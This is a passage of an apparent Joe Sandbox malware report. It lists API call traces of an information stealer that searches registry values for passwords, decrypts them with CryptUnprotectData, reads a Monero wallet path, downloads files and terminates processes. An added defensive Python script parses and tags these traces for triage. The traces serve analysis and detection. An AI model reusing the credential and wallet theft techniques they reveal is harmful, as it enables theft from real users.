                          • Opcode ID: fd07cefbcb385b346f92bcf07cc3261278ccb3b775b1d55f075aca388edfb2dc
                          • Instruction ID: 4d22eb18e12159a4260a78c91c9deb96161a9b98e27e3dd892add59af8ef6306
                          • Opcode Fuzzy Hash: fd07cefbcb385b346f92bcf07cc3261278ccb3b775b1d55f075aca388edfb2dc
                          • Instruction Fuzzy Hash: 83511CB5A24208EFDB10DFA4ED89AAEB7B9EF48300F104519F905A3251DB74AD05DFA0
                          APIs
                          • lstrcat.KERNEL32(?,010DD930), ref: 0071E00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0071E037
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E07D
                          • lstrcat.KERNEL32(?,?), ref: 0071E098
                          • lstrcat.KERNEL32(?,?), ref: 0071E0AC
                          • lstrcat.KERNEL32(?,010CAF50), ref: 0071E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0071E0D4
                          • lstrcat.KERNEL32(?,010DD1C8), ref: 0071E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0071E126
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true (same associated dumps, IDA Plugin snapshot hcaresult_0_2_700000_file.jbxd and Yara matches as listed for the first function above)
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 4230089145-0
                          • Opcode ID: efa5b85c2f80bb9dd7cf6a6eafbf7fe559d4357307e17fea9fb7cca476bad78b
                          • Instruction ID: 50ee8f362d70d7b98b697bd4ce9c8b8196246e2269418891b9fc21a6fb54e411
                          • Opcode Fuzzy Hash: efa5b85c2f80bb9dd7cf6a6eafbf7fe559d4357307e17fea9fb7cca476bad78b
                          • Instruction Fuzzy Hash: F1613E7291011CEBCB55DB68DC48ADD77B5BF48300F1089A5BA0AA3291DF74AF859F90
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 00706AFF
                          • InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 00706B2C
                          • StrCmpCA.SHLWAPI(?,010DE538), ref: 00706B4A
                          • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00706B6A
                          • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00706B88
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00706BA1
                          • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00706BC6
                          • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00706BF0
                          • CloseHandle.KERNEL32(00000000), ref: 00706C10
                          • InternetCloseHandle.WININET(00000000), ref: 00706C17
                          • InternetCloseHandle.WININET(?), ref: 00706C21
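                           The API listings above are the raw material of a triage pass: the chain at 0070A026 reads an environment variable, rewrites it with SetEnvironmentVariableA and then calls LoadLibraryA; the chain at 007245CA opens a process with access mask 0x1001 (PROCESS_TERMINATE | PROCESS_QUERY_LIMITED_INFORMATION) and terminates it; the chain at 00724276 renders the desktop window into an HGLOBAL-backed stream; the chain at 0071E037 builds a path under CSIDL 0x1A (CSIDL_APPDATA) and probes it with GetFileAttributesA; and the chain at 00706B6A fetches a URL with WinINet, creates a file with GENERIC_WRITE / CREATE_ALWAYS and copies it down in 0x400-byte InternetReadFile/WriteFile rounds. The script below is an added example for this page, not Joe Sandbox code or part of the report: it parses lines in exactly the "• API.MODULE(args), ref: ADDR" form printed above, decodes the Win32 constants that matter (values from the Windows SDK headers), and tags ordered API subsequences with behaviour labels. The labels are an analyst's interpretation of the chains on this page; the listing does not name the environment variable being rewritten, so that label only records the rewrite-then-load pattern. The sample input is two listings copied from the report above.

```python
"""Triage helper for Joe Sandbox 'APIs' listings (added example, not sandbox code).

Parses the per-function API lines into structured calls, decodes a few Win32
constants (Windows SDK values) and tags ordered call sequences with analyst labels.
"""
import re
from dataclasses import dataclass

# One listing line: "• OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 007245CA"
API_LINE = re.compile(
    r"•\s*(?P<api>[\w:]+)\.(?P<mod>\w+)"   # api name (std::... allowed) and module
    r"(?:\((?P<args>[^)]*)\))?,?\s*"      # optional argument list as Joe prints it
    r"ref:\s*(?P<ref>[0-9A-Fa-f]+)"       # call-site address
)

@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int

def parse_calls(text):
    """Return the Call records found in a block of listing text, in listing order."""
    calls = []
    for m in API_LINE.finditer(text):
        raw = m.group("args") or ""
        args = [a.strip() for a in raw.split(",")] if raw else []
        calls.append(Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16)))
    return calls

def _hex(v):
    """Joe prints '?' for unknown values and negative hex for top-bit-set values."""
    try:
        return int(v, 16) & 0xFFFFFFFF
    except ValueError:
        return None

# Windows SDK constants (subset) used by the listings on this page.
PROCESS_ACCESS = {0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION",
                  0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
                  0x0400: "PROCESS_QUERY_INFORMATION", 0x1000: "PROCESS_QUERY_LIMITED_INFORMATION"}
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
CSIDL = {0x05: "CSIDL_PERSONAL", 0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA"}
CREATE_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS"}

def _flags(value, table):
    return "|".join(n for bit, n in table.items() if value & bit) or hex(value)

def decode(call):
    """Human-readable decodings of the arguments an analyst looks at first."""
    a, out = call.args, {}
    if call.api == "OpenProcess" and a and _hex(a[0]) is not None:
        out["desired_access"] = _flags(_hex(a[0]), PROCESS_ACCESS)
    elif call.api == "SHGetFolderPathA" and len(a) > 1 and _hex(a[1]) is not None:
        out["csidl"] = CSIDL.get(_hex(a[1]) & 0xFF, hex(_hex(a[1])))
    elif call.api == "CreateFileA" and len(a) > 4:
        if _hex(a[1]) is not None:
            out["access"] = _flags(_hex(a[1]), GENERIC_ACCESS)
        if _hex(a[4]) is not None:
            out["disposition"] = CREATE_DISPOSITION.get(_hex(a[4]), hex(_hex(a[4])))
    elif call.api == "InternetReadFile" and len(a) > 2 and _hex(a[2]) is not None:
        out["chunk_bytes"] = _hex(a[2])
    return out

# Ordered API subsequences and the behaviour each indicates (analyst labels, not sandbox output).
BEHAVIOURS = {
    "download_to_disk": ["InternetOpenUrlA", "CreateFileA", "InternetReadFile", "WriteFile"],
    "terminate_process_by_pid": ["OpenProcess", "TerminateProcess"],
    "screen_capture_to_memory": ["GetDesktopWindow", "GetWindowRect", "SelectObject", "GetHGlobalFromStream"],
    "env_var_rewrite_then_loadlibrary": ["GetEnvironmentVariableA", "SetEnvironmentVariableA", "LoadLibraryA"],
    "appdata_path_probe": ["SHGetFolderPathA", "GetFileAttributesA"],
}

def _in_order(names, wanted):
    """True if every name in `wanted` occurs in `names` in that order (gaps allowed)."""
    it = iter(names)
    return all(any(n == w for n in it) for w in wanted)

def tag_behaviours(calls):
    names = [c.api for c in calls]
    return sorted(b for b, seq in BEHAVIOURS.items() if _in_order(names, seq))

def triage(text):
    calls = parse_calls(text)
    return {"behaviours": tag_behaviours(calls),
            "decoded": {f"{c.api}@{c.ref:08X}": d for c in calls if (d := decode(c))}}

# Sample input: two listings copied from the report above (downloader and process killer).
SAMPLE_DOWNLOADER = """
• InternetOpenA.WININET(0072CFEC,00000001,00000000,00000000,00000000), ref: 00706B2C
• InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00706B6A
• CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00706B88
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 00706BA1
• WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00706BC6
• InternetReadFile.WININET(00000000,?,00000400,?), ref: 00706BF0
• CloseHandle.KERNEL32(00000000), ref: 00706C10
"""
SAMPLE_KILLER = """
• memset.MSVCRT ref: 0072451A
• wsprintfW.USER32 ref: 0072455B
• OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 007245CA
• TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 007245D9
• CloseHandle.KERNEL32(00000000,?,?), ref: 007245E0
"""

if __name__ == "__main__":
    for name, sample in (("downloader", SAMPLE_DOWNLOADER), ("killer", SAMPLE_KILLER)):
        print(name, triage(sample))
```

                           The subsequence match deliberately allows gaps, because Joe interleaves string-handling calls (lstrcpy, StrCmpCA) between the calls that define the behaviour. Argument values of 00000000 in the listing are what the sandbox recorded at hook time, not evidence that the sample passed NULL, so the decoder only interprets constants that are stable across runs (access masks, CSIDL, creation disposition, read chunk size).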
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true (same associated dumps, IDA Plugin snapshot hcaresult_0_2_700000_file.jbxd and Yara matches as listed for the first function above)
                          Similarity
                          • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                          • String ID:
                          • API String ID: 2500263513-0
                          • Opcode ID: da18afbdb2d8af6ba1ec0165985515162aeacd73c0226149ffbf12eb38053ebe
                          • Instruction ID: d4c6ba3c3ba7aca41dc7c570c54eaaf3711b5228aef4822e99a1d5df00519e75
                          • Opcode Fuzzy Hash: da18afbdb2d8af6ba1ec0165985515162aeacd73c0226149ffbf12eb38053ebe
                          • Instruction Fuzzy Hash: 40417CB1A10205EBEB24DB64DC89FAF77A8EB04700F104554FA05E72C0EF74AE459BA4
                          APIs
                          • lstrcpy.KERNEL32(00000000,0072CFEC), ref: 0070BC1F
                          • lstrlen.KERNEL32(00000000), ref: 0070BC52
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070BC7C
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0070BC84
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0070BCAC
                          • lstrlen.KERNEL32(00734AD4), ref: 0070BD23
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true (same associated dumps, IDA Plugin snapshot hcaresult_0_2_700000_file.jbxd and Yara matches as listed for the first function above)
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: d2973d6f5c6b1e1c0ea44a791d5dbd92054942a2eaaaaf62ef2c8845d7d9b8e0
                          • Instruction ID: 48e257e5d30de0600047fffe0d91713113a2d625bab3ee2ecda6de804e765978
                          • Opcode Fuzzy Hash: d2973d6f5c6b1e1c0ea44a791d5dbd92054942a2eaaaaf62ef2c8845d7d9b8e0
                          • Instruction Fuzzy Hash: 25A18171614205CFCB25EF68D94DA5EB7F0AF44304F188269E806E72A2DB39DD42DF50
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725F2A
                          • std::_Xinvalid_argument.LIBCPMT ref: 00725F49
                          • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00726014
                          • memmove.MSVCRT(00000000,00000000,?), ref: 0072609F
                          • std::_Xinvalid_argument.LIBCPMT ref: 007260D0
                          Strings
                           Memory Dump Source
                           • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true (same associated dumps, IDA Plugin snapshot hcaresult_0_2_700000_file.jbxd and Yara matches as listed for the first function above)
                          Similarity
                          • API ID: Xinvalid_argumentstd::_$memmove
                          • String ID: invalid string position$string too long
                          • API String ID: 1975243496-4289949731
                          • Opcode ID: eb99f3027cf1e141be01f34573d76ba3efc03461d184fbf5a56181a4cba5538e
                          • Instruction ID: 15fd14741b7a3701849d020b09fe50ef57db6f9d504ab31aaf003d197e2c4e8c
                          • Opcode Fuzzy Hash: eb99f3027cf1e141be01f34573d76ba3efc03461d184fbf5a56181a4cba5538e
                          • Instruction Fuzzy Hash: BB618070700514DBDB28CF5CE9D4D6EB3B6EF84704B244A5AE49287382E739EE809795
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E06F
                          • lstrcat.KERNEL32(?,00000000), ref: 0071E07D
                          • lstrcat.KERNEL32(?,?), ref: 0071E098
                          • lstrcat.KERNEL32(?,?), ref: 0071E0AC
                          • lstrcat.KERNEL32(?,010CAF50), ref: 0071E0C0
                          • lstrcat.KERNEL32(?,?), ref: 0071E0D4
                          • lstrcat.KERNEL32(?,010DD1C8), ref: 0071E0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 0071E11F
                          • GetFileAttributesA.KERNEL32(00000000), ref: 0071E126
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$AttributesFile
                          • String ID:
                          • API String ID: 3428472996-0
                          • Opcode ID: 95a5f3415ec19f13e31c6a2585c5e9f3695b1641c625f226bbaa1aa11b30cd5b
                          • Instruction ID: b4ff5dbe8050d984ff30b1241d862f565166f69f82b92ee70525fa55c3158ced
                          • Opcode Fuzzy Hash: 95a5f3415ec19f13e31c6a2585c5e9f3695b1641c625f226bbaa1aa11b30cd5b
                          • Instruction Fuzzy Hash: 9E41417292011CDBCB25DB68DC496DD77B5BF48300F104A95F90AA3291DF789F869F90
                          APIs
                            • Part of subcall function 007077D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00707805
                            • Part of subcall function 007077D0: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0070784A
                            • Part of subcall function 007077D0: StrStrA.SHLWAPI(?,Password), ref: 007078B8
                            • Part of subcall function 007077D0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 007078EC
                            • Part of subcall function 007077D0: HeapFree.KERNEL32(00000000), ref: 007078F3
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 00707A90
                          • lstrcat.KERNEL32(00000000,?), ref: 00707ABD
                          • lstrcat.KERNEL32(00000000, : ), ref: 00707ACF
                          • lstrcat.KERNEL32(00000000,?), ref: 00707AF0
                          • wsprintfA.USER32 ref: 00707B10
                          • lstrcpy.KERNEL32(00000000,?), ref: 00707B39
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00707B47
                          • lstrcat.KERNEL32(00000000,00734AD4), ref: 00707B60
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Heap$EnumFreeOpenProcessValuelstrcpywsprintf
                          • String ID: :
                          • API String ID: 398153587-3653984579
                          • Opcode ID: fdb0ce142b7bc4a7a0ce334b672e1c7bd52e58c5d05f623a54eaccd5c84c4be9
                          • Instruction ID: 78d657925be93a64bfc58ba71de5625463fa988f4188491f95c769deed732244
                          • Opcode Fuzzy Hash: fdb0ce142b7bc4a7a0ce334b672e1c7bd52e58c5d05f623a54eaccd5c84c4be9
                          • Instruction Fuzzy Hash: 143175F2E18214EFCB28DB68DC489ABB7B9EB84704F144619F50593251DB78F941DBA0
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 0071820C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00718243
                          • lstrlen.KERNEL32(00000000), ref: 00718260
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00718297
                          • lstrlen.KERNEL32(00000000), ref: 007182B4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007182EB
                          • lstrlen.KERNEL32(00000000), ref: 00718308
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00718337
                          • lstrlen.KERNEL32(00000000), ref: 00718351
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00718380
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 73c8566535fad00c1c5eeb7687360c8de824bc2a60a3b68eb88b5e1410d3f0be
                          • Instruction ID: 8ce0b55902977407fdafe6542a5a7dbd787c83ff9d853c8c53a3127daf12735b
                          • Opcode Fuzzy Hash: 73c8566535fad00c1c5eeb7687360c8de824bc2a60a3b68eb88b5e1410d3f0be
                          • Instruction Fuzzy Hash: 41518E71A10602DBDB54DF6CD858AAEB7E4EF00700F154614AD16EB285DF38ED91CBE1
                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00707805
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0070784A
                          • StrStrA.SHLWAPI(?,Password), ref: 007078B8
                            • Part of subcall function 00707750: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0070775E
                            • Part of subcall function 00707750: RtlAllocateHeap.NTDLL(00000000), ref: 00707765
                            • Part of subcall function 00707750: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0070778D
                            • Part of subcall function 00707750: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 007077AD
                            • Part of subcall function 00707750: LocalFree.KERNEL32(?), ref: 007077B7
                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007078EC
                          • HeapFree.KERNEL32(00000000), ref: 007078F3
                          • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00707A35
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$EnumFreeProcessValue$AllocateByteCharCryptDataLocalMultiOpenUnprotectWide
                          • String ID: Password
                          • API String ID: 356768136-3434357891
                          • Opcode ID: ad07c437cc63b8b6d035cf1b6b2a51e5bd50fe64fffcdb9024807fe5a540a75a
                          • Instruction ID: d362682771b43881c749998c53bf9a4db182eb454acf85ab0e958252d0e1a9ba
                          • Opcode Fuzzy Hash: ad07c437cc63b8b6d035cf1b6b2a51e5bd50fe64fffcdb9024807fe5a540a75a
                          • Instruction Fuzzy Hash: AF714FB1D0421DEBDB14DF94DC84ADEB7F9EF48300F108269E509A7240EB756A89CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00701135
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0070113C
                          • RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 00701159
                          • RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 00701173
                          • RegCloseKey.ADVAPI32(?), ref: 0070117D
                          Strings
                          • SOFTWARE\monero-project\monero-core, xrefs: 0070114F
                          • wallet_path, xrefs: 0070116D
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: SOFTWARE\monero-project\monero-core$wallet_path
                          • API String ID: 3225020163-4244082812
                          • Opcode ID: 40df330bdb8500ca1befdbbca74dbf2f5acaa08305043fd32722a0384b502749
                          • Instruction ID: 8250a515f432563c512fa7bd0ca0ad5380d5e5219d4a4ce467936315fa827263
                          • Opcode Fuzzy Hash: 40df330bdb8500ca1befdbbca74dbf2f5acaa08305043fd32722a0384b502749
                          • Instruction Fuzzy Hash: D9F090B5644308BBE7049BE09C8DFEB7B7CEB04715F000154FE05E2280EAB05A449BA0
                          APIs
                          • memcmp.MSVCRT(?,v20,00000003), ref: 00709E04
                          • memcmp.MSVCRT(?,v10,00000003), ref: 00709E42
                          • LocalAlloc.KERNEL32(00000040), ref: 00709EA7
                            • Part of subcall function 007271E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007271FE
                          • lstrcpy.KERNEL32(00000000,00734C48), ref: 00709FB2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpymemcmp$AllocLocal
                          • String ID: @$v10$v20
                          • API String ID: 102826412-278772428
                          • Opcode ID: e4c8913b807668bcb01b9d919b777a533531cc618f5a94a954fce6c5f9e85a02
                          • Instruction ID: 1200c482a0e18c7fe950aa910f2d200d290803bdf77c85180dfaca21cd49903b
                          • Opcode Fuzzy Hash: e4c8913b807668bcb01b9d919b777a533531cc618f5a94a954fce6c5f9e85a02
                          • Instruction Fuzzy Hash: 0E51A272A10219DBDB11EF68DC89B9E77F4AF50314F154224FE49EB282DB78ED058B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0070565A
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00705661
                          • InternetOpenA.WININET(0072CFEC,00000000,00000000,00000000,00000000), ref: 00705677
                          • InternetOpenUrlA.WININET(00000000,00000001,00000000,00000000,04000100,00000000), ref: 00705692
                          • InternetReadFile.WININET(?,?,00000400,00000001), ref: 007056BC
                          • memcpy.MSVCRT(00000000,?,00000001), ref: 007056E1
                          • InternetCloseHandle.WININET(?), ref: 007056FA
                          • InternetCloseHandle.WININET(00000000), ref: 00705701
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                          • String ID:
                          • API String ID: 1008454911-0
                          • Opcode ID: 0024836e18cf3c5d400129b029c6498dae95e0774caf69bfe7848b7ba97a7c7d
                          • Instruction ID: 73482982754f05767cddd9ed543dc1e469abeb315b019a7a3311d75e90938990
                          • Opcode Fuzzy Hash: 0024836e18cf3c5d400129b029c6498dae95e0774caf69bfe7848b7ba97a7c7d
                          • Instruction Fuzzy Hash: FF41AC70A04605EFDB24CF94DC88BAAB7F4FF48700F1481A9E9089B2D0E7B5A941DF90
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?), ref: 00724759
                          • Process32First.KERNEL32(00000000,00000128), ref: 00724769
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0072477B
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0072479C
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 007247AB
                          • CloseHandle.KERNEL32(00000000), ref: 007247B2
                          • Process32Next.KERNEL32(00000000,00000128), ref: 007247C0
                          • CloseHandle.KERNEL32(00000000), ref: 007247CB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2085133924.0000000000701000.00000040.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 4b53d29ecef5b73d5e7cc6b51691c6693055412e2a03cabdbcf7d9f1c6dcc93c
                          • Instruction ID: 2e58e5c1b640f146ae66a7795c9c7cc333740929c2b1f36843023dd78b0290dc
                          • Opcode Fuzzy Hash: 4b53d29ecef5b73d5e7cc6b51691c6693055412e2a03cabdbcf7d9f1c6dcc93c
                          • Instruction Fuzzy Hash: 0D01B171615324ABE7215B70ACC9FEB77BCEB08752F000180F909E1290EFB88D809EA0
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00718435
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071846C
                          • lstrlen.KERNEL32(00000000), ref: 007184B2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007184E9
                          • lstrlen.KERNEL32(00000000), ref: 007184FF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0071852E
                          • StrCmpCA.SHLWAPI(00000000,00734C3C), ref: 0071853E
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: baa8ad8de328dd446d4f8f641a9dbf94622c84fc4bea407492f60a124c8d1280
                          • Instruction ID: d2f529183c11beb969498632ae5499409256661a4af626c1eea081a71ba2ba4e
                          • Opcode Fuzzy Hash: baa8ad8de328dd446d4f8f641a9dbf94622c84fc4bea407492f60a124c8d1280
                          • Instruction Fuzzy Hash: 46516F755002029FCB64DF6CD888A9BB7F5EF44700F248559EC45EB285EF38E981CB51
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00722925
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0072292C
                          • RegOpenKeyExA.ADVAPI32(80000002,010CB9D8,00000000,00020119,007228A9), ref: 0072294B
                          • RegQueryValueExA.ADVAPI32(007228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00722965
                          • RegCloseKey.ADVAPI32(007228A9), ref: 0072296F
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: CurrentBuildNumber
                          • API String ID: 3225020163-1022791448
                          • Opcode ID: d1299768b992b1dc0314454611ad9c4fa2dad7a773d5a101d16c2a8bb348231c
                          • Instruction ID: aafa73e0900a873dd9f8f72b7fd9322d4d506fc4fd9d8428850803cbaf66102e
                          • Opcode Fuzzy Hash: d1299768b992b1dc0314454611ad9c4fa2dad7a773d5a101d16c2a8bb348231c
                          • Instruction Fuzzy Hash: F001D475604319BBD314CBA0EC59FFB7BBCEB48711F100058FE85E7241EA7199458B90
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00722895
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0072289C
                            • Part of subcall function 00722910: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00722925
                            • Part of subcall function 00722910: RtlAllocateHeap.NTDLL(00000000), ref: 0072292C
                            • Part of subcall function 00722910: RegOpenKeyExA.ADVAPI32(80000002,010CB9D8,00000000,00020119,007228A9), ref: 0072294B
                            • Part of subcall function 00722910: RegQueryValueExA.ADVAPI32(007228A9,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 00722965
                            • Part of subcall function 00722910: RegCloseKey.ADVAPI32(007228A9), ref: 0072296F
                          • RegOpenKeyExA.ADVAPI32(80000002,010CB9D8,00000000,00020119,00719500), ref: 007228D1
                          • RegQueryValueExA.ADVAPI32(00719500,010DE080,00000000,00000000,00000000,000000FF), ref: 007228EC
                          • RegCloseKey.ADVAPI32(00719500), ref: 007228F6
                          Strings
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID: Windows 11
                          • API String ID: 3225020163-2517555085
                          • Opcode ID: 49104072a3378f65c4684595a12f5570830161f565d7aa5656d92d428c6d7e61
                          • Instruction ID: f9bb6468b120d4769706384ec342d830f2faa4e68c211db3847cb952b52a9236
                          • Opcode Fuzzy Hash: 49104072a3378f65c4684595a12f5570830161f565d7aa5656d92d428c6d7e61
                          • Instruction Fuzzy Hash: AD01A275614318BFD7149BA4AC4DFAB777DEB44311F000154FE08D6251DAB499459BE0
                          APIs
                          • LoadLibraryA.KERNEL32(?), ref: 0070723E
                          • GetProcessHeap.KERNEL32(00000008,00000010), ref: 00707279
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00707280
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007072C3
                          • HeapFree.KERNEL32(00000000), ref: 007072CA
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00707329
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AddressAllocateFreeLibraryLoadProc
                          • String ID:
                          • API String ID: 174687898-0
                          • Opcode ID: 5446667985cf3d80a9cd79f06d2ae615e83b28ef09d6a3986f8160f06e3000fe
                          • Instruction ID: c57f29bf7525e792cc771b6eb73b155dfe6f0e08d683fb47190a271b4896c1d7
                          • Opcode Fuzzy Hash: 5446667985cf3d80a9cd79f06d2ae615e83b28ef09d6a3986f8160f06e3000fe
